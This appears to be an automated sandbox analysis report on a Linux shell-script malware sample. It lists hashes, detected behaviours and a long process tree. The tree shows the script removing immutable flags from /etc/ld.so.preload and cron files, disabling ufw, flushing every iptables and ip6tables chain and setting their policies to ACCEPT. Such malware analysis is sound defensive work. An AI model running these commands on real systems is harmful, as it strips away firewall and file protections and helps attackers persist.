Resubmissions

15-03-2024 16:07

240315-tkykeacf7z 1

25-02-2024 14:29

240225-rtjrhaee9z 10

Analysis

  • max time kernel
    530s
  • max time network
    1805s
  • platform
    ubuntu-20.04_amd64
  • resource
    ubuntu2004-amd64-20240221-en
  • resource tags

    arch:amd64arch:i386image:ubuntu2004-amd64-20240221-enkernel:5.4.0-169-genericlocale:en-usos:ubuntu-20.04-amd64system
  • submitted
    25-02-2024 14:29

General

  • Target

    script_malware/063ccf736c2c19ca5db70b8d8a7cf00377899c16023c63fee836bdefadd336c1.sh

  • Size

    11KB

  • MD5

    07b7746b922cf7d7fa821123a226ed36

  • SHA1

    bf2df8f2813ef4e2cf61ea193e091b808aa854c7

  • SHA256

    063ccf736c2c19ca5db70b8d8a7cf00377899c16023c63fee836bdefadd336c1

  • SHA512

    ad29993a88c996f96fdc5c01fda89400b1e27228c58445d181dc6af974a171ee36e014d90aa8e09de6d83e4bfd12d167eb361bd52b6d194af6f249a6812019cb

  • SSDEEP

    192:Xws08k5tkd5DFPSV3n7/e867jNKvSbRXA8kWmk4lkCIkvUgoaES8DSWOlA+1esP:XQwL4/e867USbRXA8kWT4yCtvUgDjdWi

Malware Config

Signatures

  • Modifies the dynamic linker configuration file 1 TTPs 1 IoCs

    Malware can modify the configuration file of the dynamic linker to preload malicous libraries with every executed process.

  • Flushes firewall rules 2 IoCs

    Flushes/ disables firewall rules inside the Linux kernel.

  • Loads a kernel module 1 IoCs

    Loads a Linux kernel module, potentially to achieve persistence

  • Reads EFI boot settings 2 IoCs

    Reads EFI boot settings from the efivars filesystem, may contain security secrets or sensitive data.

  • Attempts to change immutable files 64 IoCs

    Modifies inode attributes on the filesystem to allow changing of immutable files.

  • Creates/modifies Cron job 1 TTPs 50 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Modifies systemd 1 TTPs 1 IoCs

    Adds/ modifies systemd service files. Likely to achieve persistence.

  • Reads CPU attributes 1 TTPs 44 IoCs
  • Enumerates kernel/hardware configuration 1 TTPs 4 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

Processes

  • /tmp/script_malware/063ccf736c2c19ca5db70b8d8a7cf00377899c16023c63fee836bdefadd336c1.sh
    /tmp/script_malware/063ccf736c2c19ca5db70b8d8a7cf00377899c16023c63fee836bdefadd336c1.sh
    1⤵
    • Modifies the dynamic linker configuration file
    • Modifies systemd
    PID:1476
    • /usr/bin/chattr
      chattr -i /etc/ld.so.preload
      2⤵
      • Attempts to change immutable files
      PID:1477
    • /usr/bin/rm
      rm -f /etc/ld.so.preload
      2⤵
        PID:1478
      • /usr/bin/chattr
        chattr -R -i /var/spool/cron
        2⤵
        • Attempts to change immutable files
        PID:1479
      • /usr/bin/chattr
        chattr -i /etc/crontab
        2⤵
        • Attempts to change immutable files
        PID:1480
      • /usr/sbin/ufw
        ufw disable
        2⤵
        • Flushes firewall rules
        PID:1481
        • /usr/sbin/iptables
          /usr/sbin/iptables -V
          3⤵
            PID:1488
          • /lib/ufw/ufw-init
            /lib/ufw/ufw-init force-stop
            3⤵
            • Attempts to change immutable files
            PID:1489
            • /sbin/ip6tables
              ip6tables -L INPUT -n
              4⤵
                PID:1490
                • /sbin/modprobe
                  /sbin/modprobe ip6_tables
                  5⤵
                  • Loads a kernel module
                  • Enumerates kernel/hardware configuration
                  PID:1491
              • /sbin/iptables
                iptables -F ufw-logging-deny
                4⤵
                  PID:1493
                • /sbin/iptables
                  iptables -F ufw-logging-allow
                  4⤵
                    PID:1497
                  • /sbin/iptables
                    iptables -F ufw-not-local
                    4⤵
                      PID:1498
                    • /sbin/iptables
                      iptables -F ufw-user-logging-input
                      4⤵
                      • Attempts to change immutable files
                      PID:1499
                    • /sbin/iptables
                      iptables -F ufw-user-limit-accept
                      4⤵
                        PID:1500
                      • /sbin/iptables
                        iptables -F ufw-user-limit
                        4⤵
                          PID:1501
                        • /sbin/iptables
                          iptables -F ufw-skip-to-policy-input
                          4⤵
                          • Attempts to change immutable files
                          PID:1502
                        • /sbin/iptables
                          iptables -F ufw-reject-input
                          4⤵
                          • Attempts to change immutable files
                          PID:1503
                        • /sbin/iptables
                          iptables -F ufw-after-logging-input
                          4⤵
                          • Attempts to change immutable files
                          PID:1504
                        • /sbin/iptables
                          iptables -F ufw-after-input
                          4⤵
                          • Attempts to change immutable files
                          PID:1505
                        • /sbin/iptables
                          iptables -F ufw-user-input
                          4⤵
                          • Attempts to change immutable files
                          PID:1506
                        • /sbin/iptables
                          iptables -F ufw-before-input
                          4⤵
                          • Attempts to change immutable files
                          PID:1507
                        • /sbin/iptables
                          iptables -F ufw-before-logging-input
                          4⤵
                          • Attempts to change immutable files
                          PID:1508
                        • /sbin/iptables
                          iptables -F ufw-skip-to-policy-forward
                          4⤵
                            PID:1509
                          • /sbin/iptables
                            iptables -F ufw-reject-forward
                            4⤵
                              PID:1510
                            • /sbin/iptables
                              iptables -F ufw-after-logging-forward
                              4⤵
                                PID:1511
                              • /sbin/iptables
                                iptables -F ufw-after-forward
                                4⤵
                                  PID:1512
                                • /sbin/iptables
                                  iptables -F ufw-user-logging-forward
                                  4⤵
                                    PID:1513
                                  • /sbin/iptables
                                    iptables -F ufw-user-forward
                                    4⤵
                                      PID:1514
                                    • /sbin/iptables
                                      iptables -F ufw-before-forward
                                      4⤵
                                        PID:1515
                                      • /sbin/iptables
                                        iptables -F ufw-before-logging-forward
                                        4⤵
                                          PID:1516
                                        • /sbin/iptables
                                          iptables -F ufw-track-forward
                                          4⤵
                                            PID:1517
                                          • /sbin/iptables
                                            iptables -F ufw-track-output
                                            4⤵
                                              PID:1518
                                            • /sbin/iptables
                                              iptables -F ufw-track-input
                                              4⤵
                                              • Attempts to change immutable files
                                              PID:1519
                                            • /sbin/iptables
                                              iptables -F ufw-skip-to-policy-output
                                              4⤵
                                                PID:1520
                                              • /sbin/iptables
                                                iptables -F ufw-reject-output
                                                4⤵
                                                  PID:1521
                                                • /sbin/iptables
                                                  iptables -F ufw-after-logging-output
                                                  4⤵
                                                    PID:1522
                                                  • /sbin/iptables
                                                    iptables -F ufw-after-output
                                                    4⤵
                                                      PID:1523
                                                    • /sbin/iptables
                                                      iptables -F ufw-user-logging-output
                                                      4⤵
                                                        PID:1524
                                                      • /sbin/iptables
                                                        iptables -F ufw-user-output
                                                        4⤵
                                                          PID:1525
                                                        • /sbin/iptables
                                                          iptables -F ufw-before-output
                                                          4⤵
                                                            PID:1526
                                                          • /sbin/iptables
                                                            iptables -F ufw-before-logging-output
                                                            4⤵
                                                              PID:1527
                                                            • /sbin/iptables
                                                              iptables -Z ufw-logging-deny
                                                              4⤵
                                                                PID:1528
                                                              • /sbin/iptables
                                                                iptables -Z ufw-logging-allow
                                                                4⤵
                                                                  PID:1529
                                                                • /sbin/iptables
                                                                  iptables -Z ufw-not-local
                                                                  4⤵
                                                                    PID:1530
                                                                  • /sbin/iptables
                                                                    iptables -Z ufw-user-logging-input
                                                                    4⤵
                                                                    • Attempts to change immutable files
                                                                    PID:1531
                                                                  • /sbin/iptables
                                                                    iptables -Z ufw-user-limit-accept
                                                                    4⤵
                                                                      PID:1532
                                                                    • /sbin/iptables
                                                                      iptables -Z ufw-user-limit
                                                                      4⤵
                                                                        PID:1533
                                                                      • /sbin/iptables
                                                                        iptables -Z ufw-skip-to-policy-input
                                                                        4⤵
                                                                        • Attempts to change immutable files
                                                                        PID:1534
                                                                      • /sbin/iptables
                                                                        iptables -Z ufw-reject-input
                                                                        4⤵
                                                                        • Attempts to change immutable files
                                                                        PID:1535
                                                                      • /sbin/iptables
                                                                        iptables -Z ufw-after-logging-input
                                                                        4⤵
                                                                        • Attempts to change immutable files
                                                                        PID:1536
                                                                      • /sbin/iptables
                                                                        iptables -Z ufw-after-input
                                                                        4⤵
                                                                        • Attempts to change immutable files
                                                                        PID:1537
                                                                      • /sbin/iptables
                                                                        iptables -Z ufw-user-input
                                                                        4⤵
                                                                        • Attempts to change immutable files
                                                                        PID:1538
                                                                      • /sbin/iptables
                                                                        iptables -Z ufw-before-input
                                                                        4⤵
                                                                        • Attempts to change immutable files
                                                                        PID:1539
                                                                      • /sbin/iptables
                                                                        iptables -Z ufw-before-logging-input
                                                                        4⤵
                                                                        • Attempts to change immutable files
                                                                        PID:1540
                                                                      • /sbin/iptables
                                                                        iptables -Z ufw-skip-to-policy-forward
                                                                        4⤵
                                                                          PID:1541
                                                                        • /sbin/iptables
                                                                          iptables -Z ufw-reject-forward
                                                                          4⤵
                                                                            PID:1542
                                                                          • /sbin/iptables
                                                                            iptables -Z ufw-after-logging-forward
                                                                            4⤵
                                                                              PID:1543
                                                                            • /sbin/iptables
                                                                              iptables -Z ufw-after-forward
                                                                              4⤵
                                                                                PID:1544
                                                                              • /sbin/iptables
                                                                                iptables -Z ufw-user-logging-forward
                                                                                4⤵
                                                                                  PID:1545
                                                                                • /sbin/iptables
                                                                                  iptables -Z ufw-user-forward
                                                                                  4⤵
                                                                                    PID:1546
                                                                                  • /sbin/iptables
                                                                                    iptables -Z ufw-before-forward
                                                                                    4⤵
                                                                                      PID:1547
                                                                                    • /sbin/iptables
                                                                                      iptables -Z ufw-before-logging-forward
                                                                                      4⤵
                                                                                        PID:1548
                                                                                      • /sbin/iptables
                                                                                        iptables -Z ufw-track-forward
                                                                                        4⤵
                                                                                          PID:1549
                                                                                        • /sbin/iptables
                                                                                          iptables -Z ufw-track-output
                                                                                          4⤵
                                                                                            PID:1550
                                                                                          • /sbin/iptables
                                                                                            iptables -Z ufw-track-input
                                                                                            4⤵
                                                                                            • Attempts to change immutable files
                                                                                            PID:1552
                                                                                          • /sbin/iptables
                                                                                            iptables -Z ufw-skip-to-policy-output
                                                                                            4⤵
                                                                                              PID:1553
                                                                                            • /sbin/iptables
                                                                                              iptables -Z ufw-reject-output
                                                                                              4⤵
                                                                                                PID:1554
                                                                                              • /sbin/iptables
                                                                                                iptables -Z ufw-after-logging-output
                                                                                                4⤵
                                                                                                  PID:1555
                                                                                                • /sbin/iptables
                                                                                                  iptables -Z ufw-after-output
                                                                                                  4⤵
                                                                                                    PID:1557
                                                                                                  • /sbin/iptables
                                                                                                    iptables -Z ufw-user-logging-output
                                                                                                    4⤵
                                                                                                      PID:1558
                                                                                                    • /sbin/iptables
                                                                                                      iptables -Z ufw-user-output
                                                                                                      4⤵
                                                                                                        PID:1559
                                                                                                      • /sbin/iptables
                                                                                                        iptables -Z ufw-before-output
                                                                                                        4⤵
                                                                                                          PID:1560
                                                                                                        • /sbin/iptables
                                                                                                          iptables -Z ufw-before-logging-output
                                                                                                          4⤵
                                                                                                            PID:1561
                                                                                                          • /sbin/iptables
                                                                                                            iptables -X ufw-logging-deny
                                                                                                            4⤵
                                                                                                              PID:1562
                                                                                                            • /sbin/iptables
                                                                                                              iptables -X ufw-logging-allow
                                                                                                              4⤵
                                                                                                                PID:1563
                                                                                                              • /sbin/iptables
                                                                                                                iptables -X ufw-not-local
                                                                                                                4⤵
                                                                                                                  PID:1564
                                                                                                                • /sbin/iptables
                                                                                                                  iptables -X ufw-user-logging-input
                                                                                                                  4⤵
                                                                                                                  • Attempts to change immutable files
                                                                                                                  PID:1565
                                                                                                                • /sbin/iptables
                                                                                                                  iptables -X ufw-user-logging-output
                                                                                                                  4⤵
                                                                                                                    PID:1566
                                                                                                                  • /sbin/iptables
                                                                                                                    iptables -X ufw-user-logging-forward
                                                                                                                    4⤵
                                                                                                                      PID:1567
                                                                                                                    • /sbin/iptables
                                                                                                                      iptables -X ufw-user-limit-accept
                                                                                                                      4⤵
                                                                                                                        PID:1568
                                                                                                                      • /sbin/iptables
                                                                                                                        iptables -X ufw-user-limit
                                                                                                                        4⤵
                                                                                                                          PID:1569
                                                                                                                        • /sbin/iptables
                                                                                                                          iptables -X ufw-user-input
                                                                                                                          4⤵
                                                                                                                          • Attempts to change immutable files
                                                                                                                          PID:1571
                                                                                                                        • /sbin/iptables
                                                                                                                          iptables -X ufw-user-forward
                                                                                                                          4⤵
                                                                                                                            PID:1573
                                                                                                                          • /sbin/iptables
                                                                                                                            iptables -X ufw-user-output
                                                                                                                            4⤵
                                                                                                                              PID:1574
                                                                                                                            • /sbin/iptables
                                                                                                                              iptables -X ufw-skip-to-policy-input
                                                                                                                              4⤵
                                                                                                                              • Attempts to change immutable files
                                                                                                                              PID:1575
                                                                                                                            • /sbin/iptables
                                                                                                                              iptables -X ufw-skip-to-policy-output
                                                                                                                              4⤵
                                                                                                                                PID:1576
                                                                                                                              • /sbin/iptables
                                                                                                                                iptables -X ufw-skip-to-policy-forward
                                                                                                                                4⤵
                                                                                                                                  PID:1577
                                                                                                                                • /sbin/iptables
                                                                                                                                  iptables -P INPUT ACCEPT
                                                                                                                                  4⤵
                                                                                                                                    PID:1578
                                                                                                                                  • /sbin/iptables
                                                                                                                                    iptables -P OUTPUT ACCEPT
                                                                                                                                    4⤵
                                                                                                                                      PID:1579
                                                                                                                                    • /sbin/iptables
                                                                                                                                      iptables -P FORWARD ACCEPT
                                                                                                                                      4⤵
                                                                                                                                        PID:1580
                                                                                                                                      • /sbin/ip6tables
                                                                                                                                        ip6tables -F ufw6-logging-deny
                                                                                                                                        4⤵
                                                                                                                                          PID:1581
                                                                                                                                        • /sbin/ip6tables
                                                                                                                                          ip6tables -F ufw6-logging-allow
                                                                                                                                          4⤵
                                                                                                                                            PID:1582
                                                                                                                                          • /sbin/ip6tables
                                                                                                                                            ip6tables -F ufw6-not-local
                                                                                                                                            4⤵
                                                                                                                                              PID:1583
                                                                                                                                            • /sbin/ip6tables
                                                                                                                                              ip6tables -F ufw6-user-logging-input
                                                                                                                                              4⤵
                                                                                                                                              • Attempts to change immutable files
                                                                                                                                              PID:1584
                                                                                                                                            • /sbin/ip6tables
                                                                                                                                              ip6tables -F ufw6-user-limit-accept
                                                                                                                                              4⤵
                                                                                                                                                PID:1585
                                                                                                                                              • /sbin/ip6tables
                                                                                                                                                ip6tables -F ufw6-user-limit
                                                                                                                                                4⤵
                                                                                                                                                  PID:1586
                                                                                                                                                • /sbin/ip6tables
                                                                                                                                                  ip6tables -F ufw6-skip-to-policy-input
                                                                                                                                                  4⤵
                                                                                                                                                  • Attempts to change immutable files
                                                                                                                                                  PID:1587
                                                                                                                                                • /sbin/ip6tables
                                                                                                                                                  ip6tables -F ufw6-reject-input
                                                                                                                                                  4⤵
                                                                                                                                                  • Attempts to change immutable files
                                                                                                                                                  PID:1588
                                                                                                                                                • /sbin/ip6tables
                                                                                                                                                  ip6tables -F ufw6-after-logging-input
                                                                                                                                                  4⤵
                                                                                                                                                  • Attempts to change immutable files
                                                                                                                                                  PID:1589
                                                                                                                                                • /sbin/ip6tables
                                                                                                                                                  ip6tables -F ufw6-after-input
                                                                                                                                                  4⤵
                                                                                                                                                  • Attempts to change immutable files
                                                                                                                                                  PID:1590
                                                                                                                                                • /sbin/ip6tables
                                                                                                                                                  ip6tables -F ufw6-user-input
                                                                                                                                                  4⤵
                                                                                                                                                  • Attempts to change immutable files
                                                                                                                                                  PID:1591
                                                                                                                                                • /sbin/ip6tables
                                                                                                                                                  ip6tables -F ufw6-before-input
                                                                                                                                                  4⤵
                                                                                                                                                  • Attempts to change immutable files
                                                                                                                                                  PID:1592
                                                                                                                                                • /sbin/ip6tables
                                                                                                                                                  ip6tables -F ufw6-before-logging-input
                                                                                                                                                  4⤵
                                                                                                                                                  • Attempts to change immutable files
                                                                                                                                                  PID:1593
                                                                                                                                                • /sbin/ip6tables
                                                                                                                                                  ip6tables -F ufw6-skip-to-policy-forward
                                                                                                                                                  4⤵
                                                                                                                                                    PID:1594
                                                                                                                                                  • /sbin/ip6tables
                                                                                                                                                    ip6tables -F ufw6-reject-forward
                                                                                                                                                    4⤵
                                                                                                                                                      PID:1595
                                                                                                                                                    • /sbin/ip6tables
                                                                                                                                                      ip6tables -F ufw6-after-logging-forward
                                                                                                                                                      4⤵
                                                                                                                                                        PID:1596
                                                                                                                                                      • /sbin/ip6tables
                                                                                                                                                        ip6tables -F ufw6-after-forward
                                                                                                                                                        4⤵
                                                                                                                                                          PID:1597
                                                                                                                                                        • /sbin/ip6tables
                                                                                                                                                          ip6tables -F ufw6-user-logging-forward
                                                                                                                                                          4⤵
                                                                                                                                                            PID:1598
                                                                                                                                                          • /sbin/ip6tables
                                                                                                                                                            ip6tables -F ufw6-user-forward
                                                                                                                                                            4⤵
                                                                                                                                                              PID:1599
                                                                                                                                                            • /sbin/ip6tables
                                                                                                                                                              ip6tables -F ufw6-before-forward
                                                                                                                                                              4⤵
                                                                                                                                                                PID:1600
                                                                                                                                                              • /sbin/ip6tables
                                                                                                                                                                ip6tables -F ufw6-before-logging-forward
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:1601
                                                                                                                                                                • /sbin/ip6tables
                                                                                                                                                                  ip6tables -F ufw6-track-forward
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:1602
                                                                                                                                                                  • /sbin/ip6tables
                                                                                                                                                                    ip6tables -F ufw6-track-output
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:1603
                                                                                                                                                                    • /sbin/ip6tables
                                                                                                                                                                      ip6tables -F ufw6-track-input
                                                                                                                                                                      4⤵
                                                                                                                                                                      • Attempts to change immutable files
                                                                                                                                                                      PID:1604
                                                                                                                                                                    • /sbin/ip6tables
                                                                                                                                                                      ip6tables -F ufw6-skip-to-policy-output
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:1605
                                                                                                                                                                      • /sbin/ip6tables
                                                                                                                                                                        ip6tables -F ufw6-reject-output
                                                                                                                                                                        4⤵
                                                                                                                                                                          PID:1606
                                                                                                                                                                        • /sbin/ip6tables
                                                                                                                                                                          ip6tables -F ufw6-after-logging-output
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:1607
                                                                                                                                                                          • /sbin/ip6tables
                                                                                                                                                                            ip6tables -F ufw6-after-output
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:1608
                                                                                                                                                                            • /sbin/ip6tables
                                                                                                                                                                              ip6tables -F ufw6-user-logging-output
                                                                                                                                                                              4⤵
                                                                                                                                                                                PID:1609
                                                                                                                                                                              • /sbin/ip6tables
                                                                                                                                                                                ip6tables -F ufw6-user-output
                                                                                                                                                                                4⤵
                                                                                                                                                                                  PID:1610
                                                                                                                                                                                • /sbin/ip6tables
                                                                                                                                                                                  ip6tables -F ufw6-before-output
                                                                                                                                                                                  4⤵
                                                                                                                                                                                    PID:1611
                                                                                                                                                                                  • /sbin/ip6tables
                                                                                                                                                                                    ip6tables -F ufw6-before-logging-output
                                                                                                                                                                                    4⤵
                                                                                                                                                                                      PID:1612
                                                                                                                                                                                    • /sbin/ip6tables
                                                                                                                                                                                      ip6tables -Z ufw6-logging-deny
                                                                                                                                                                                      4⤵
                                                                                                                                                                                        PID:1613
                                                                                                                                                                                      • /sbin/ip6tables
                                                                                                                                                                                        ip6tables -Z ufw6-logging-allow
                                                                                                                                                                                        4⤵
                                                                                                                                                                                          PID:1614
                                                                                                                                                                                        • /sbin/ip6tables
                                                                                                                                                                                          ip6tables -Z ufw6-not-local
                                                                                                                                                                                          4⤵
                                                                                                                                                                                            PID:1615
                                                                                                                                                                                          • /sbin/ip6tables
                                                                                                                                                                                            ip6tables -Z ufw6-user-logging-input
                                                                                                                                                                                            4⤵
                                                                                                                                                                                            • Attempts to change immutable files
                                                                                                                                                                                            PID:1616
                                                                                                                                                                                          • /sbin/ip6tables
                                                                                                                                                                                            ip6tables -Z ufw6-user-limit-accept
                                                                                                                                                                                            4⤵
                                                                                                                                                                                              PID:1617
                                                                                                                                                                                            • /sbin/ip6tables
                                                                                                                                                                                              ip6tables -Z ufw6-user-limit
                                                                                                                                                                                              4⤵
                                                                                                                                                                                                PID:1618
                                                                                                                                                                                              • /sbin/ip6tables
                                                                                                                                                                                                ip6tables -Z ufw6-skip-to-policy-input
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • Attempts to change immutable files
                                                                                                                                                                                                PID:1619
                                                                                                                                                                                              • /sbin/ip6tables
                                                                                                                                                                                                ip6tables -Z ufw6-reject-input
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • Attempts to change immutable files
                                                                                                                                                                                                PID:1620
                                                                                                                                                                                              • /sbin/ip6tables
                                                                                                                                                                                                ip6tables -Z ufw6-after-logging-input
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • Attempts to change immutable files
                                                                                                                                                                                                PID:1621
                                                                                                                                                                                              • /sbin/ip6tables
                                                                                                                                                                                                ip6tables -Z ufw6-after-input
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • Attempts to change immutable files
                                                                                                                                                                                                PID:1622
                                                                                                                                                                                              • /sbin/ip6tables
                                                                                                                                                                                                ip6tables -Z ufw6-user-input
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • Attempts to change immutable files
                                                                                                                                                                                                PID:1623
                                                                                                                                                                                              • /sbin/ip6tables
                                                                                                                                                                                                ip6tables -Z ufw6-before-input
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • Attempts to change immutable files
                                                                                                                                                                                                PID:1624
                                                                                                                                                                                              • /sbin/ip6tables
                                                                                                                                                                                                ip6tables -Z ufw6-before-logging-input
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • Attempts to change immutable files
                                                                                                                                                                                                PID:1625
                                                                                                                                                                                              • /sbin/ip6tables
                                                                                                                                                                                                ip6tables -Z ufw6-skip-to-policy-forward
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                  PID:1626
                                                                                                                                                                                                • /sbin/ip6tables
                                                                                                                                                                                                  ip6tables -Z ufw6-reject-forward
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                    PID:1627
                                                                                                                                                                                                  • /sbin/ip6tables
                                                                                                                                                                                                    ip6tables -Z ufw6-after-logging-forward
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                      PID:1628
                                                                                                                                                                                                    • /sbin/ip6tables
                                                                                                                                                                                                      ip6tables -Z ufw6-after-forward
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                        PID:1629
                                                                                                                                                                                                      • /sbin/ip6tables
                                                                                                                                                                                                        ip6tables -Z ufw6-user-logging-forward
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                          PID:1630
                                                                                                                                                                                                        • /sbin/ip6tables
                                                                                                                                                                                                          ip6tables -Z ufw6-user-forward
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                            PID:1631
                                                                                                                                                                                                          • /sbin/ip6tables
                                                                                                                                                                                                            ip6tables -Z ufw6-before-forward
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                              PID:1633
                                                                                                                                                                                                            • /sbin/ip6tables
                                                                                                                                                                                                              ip6tables -Z ufw6-before-logging-forward
                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                PID:1635
                                                                                                                                                                                                              • /sbin/ip6tables
                                                                                                                                                                                                                ip6tables -Z ufw6-track-forward
                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                  PID:1636
                                                                                                                                                                                                                • /sbin/ip6tables
                                                                                                                                                                                                                  ip6tables -Z ufw6-track-output
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                    PID:1638
                                                                                                                                                                                                                  • /sbin/ip6tables
                                                                                                                                                                                                                    ip6tables -Z ufw6-track-input
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                    • Attempts to change immutable files
                                                                                                                                                                                                                    PID:1639
                                                                                                                                                                                                                  • /sbin/ip6tables
                                                                                                                                                                                                                    ip6tables -Z ufw6-skip-to-policy-output
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                      PID:1641
                                                                                                                                                                                                                    • /sbin/ip6tables
                                                                                                                                                                                                                      ip6tables -Z ufw6-reject-output
                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                        PID:1642
                                                                                                                                                                                                                      • /sbin/ip6tables
                                                                                                                                                                                                                        ip6tables -Z ufw6-after-logging-output
                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                          PID:1644
                                                                                                                                                                                                                        • /sbin/ip6tables
                                                                                                                                                                                                                          ip6tables -Z ufw6-after-output
                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                            PID:1645
                                                                                                                                                                                                                          • /sbin/ip6tables
                                                                                                                                                                                                                            ip6tables -Z ufw6-user-logging-output
                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                              PID:1647
                                                                                                                                                                                                                            • /sbin/ip6tables
                                                                                                                                                                                                                              ip6tables -Z ufw6-user-output
                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                PID:1648
                                                                                                                                                                                                                              • /sbin/ip6tables
                                                                                                                                                                                                                                ip6tables -Z ufw6-before-output
                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                  PID:1650
                                                                                                                                                                                                                                • /sbin/ip6tables
                                                                                                                                                                                                                                  ip6tables -Z ufw6-before-logging-output
                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                    PID:1651
                                                                                                                                                                                                                                  • /sbin/ip6tables
                                                                                                                                                                                                                                    ip6tables -X ufw6-logging-deny
                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                      PID:1653
                                                                                                                                                                                                                                    • /sbin/ip6tables
                                                                                                                                                                                                                                      ip6tables -X ufw6-logging-allow
                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                        PID:1654
                                                                                                                                                                                                                                      • /sbin/ip6tables
                                                                                                                                                                                                                                        ip6tables -X ufw6-not-local
                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                          PID:1655
                                                                                                                                                                                                                                        • /sbin/ip6tables
                                                                                                                                                                                                                                          ip6tables -X ufw6-user-logging-input
                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                          • Attempts to change immutable files
                                                                                                                                                                                                                                          PID:1657
                                                                                                                                                                                                                                        • /sbin/ip6tables
                                                                                                                                                                                                                                          ip6tables -X ufw6-user-logging-output
                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                            PID:1659
                                                                                                                                                                                                                                          • /sbin/ip6tables
                                                                                                                                                                                                                                            ip6tables -X ufw6-user-logging-forward
                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                              PID:1660
                                                                                                                                                                                                                                            • /sbin/ip6tables
                                                                                                                                                                                                                                              ip6tables -X ufw6-user-limit-accept
                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                PID:1662
                                                                                                                                                                                                                                              • /sbin/ip6tables
                                                                                                                                                                                                                                                ip6tables -X ufw6-user-limit
                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                  PID:1664
                                                                                                                                                                                                                                                • /sbin/ip6tables
                                                                                                                                                                                                                                                  ip6tables -X ufw6-user-input
                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                  • Attempts to change immutable files
                                                                                                                                                                                                                                                  PID:1665
                                                                                                                                                                                                                                                • /sbin/ip6tables
                                                                                                                                                                                                                                                  ip6tables -X ufw6-user-forward
                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                    PID:1667
                                                                                                                                                                                                                                                  • /sbin/ip6tables
                                                                                                                                                                                                                                                    ip6tables -X ufw6-user-output
                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                      PID:1668
                                                                                                                                                                                                                                                    • /sbin/ip6tables
                                                                                                                                                                                                                                                      ip6tables -X ufw6-skip-to-policy-input
                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                      • Attempts to change immutable files
                                                                                                                                                                                                                                                      PID:1670
                                                                                                                                                                                                                                                    • /sbin/ip6tables
                                                                                                                                                                                                                                                      ip6tables -X ufw6-skip-to-policy-output
                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                        PID:1671
                                                                                                                                                                                                                                                      • /sbin/ip6tables
                                                                                                                                                                                                                                                        ip6tables -X ufw6-skip-to-policy-forward
                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                          PID:1673
                                                                                                                                                                                                                                                        • /sbin/ip6tables
                                                                                                                                                                                                                                                          ip6tables -P INPUT ACCEPT
                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                            PID:1674
                                                                                                                                                                                                                                                          • /sbin/ip6tables
                                                                                                                                                                                                                                                            ip6tables -P OUTPUT ACCEPT
                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                              PID:1675
                                                                                                                                                                                                                                                            • /sbin/ip6tables
                                                                                                                                                                                                                                                              ip6tables -P FORWARD ACCEPT
                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                PID:1676
                                                                                                                                                                                                                                                          • /usr/sbin/iptables
                                                                                                                                                                                                                                                            iptables -F
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                            • Flushes firewall rules
                                                                                                                                                                                                                                                            PID:1679
                                                                                                                                                                                                                                                          • /usr/bin/id
                                                                                                                                                                                                                                                            id -u
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                              PID:1680
                                                                                                                                                                                                                                                            • /usr/bin/grep
                                                                                                                                                                                                                                                              grep -v grep
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                PID:1684
                                                                                                                                                                                                                                                              • /usr/bin/grep
                                                                                                                                                                                                                                                                grep -e /dev
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                  PID:1683
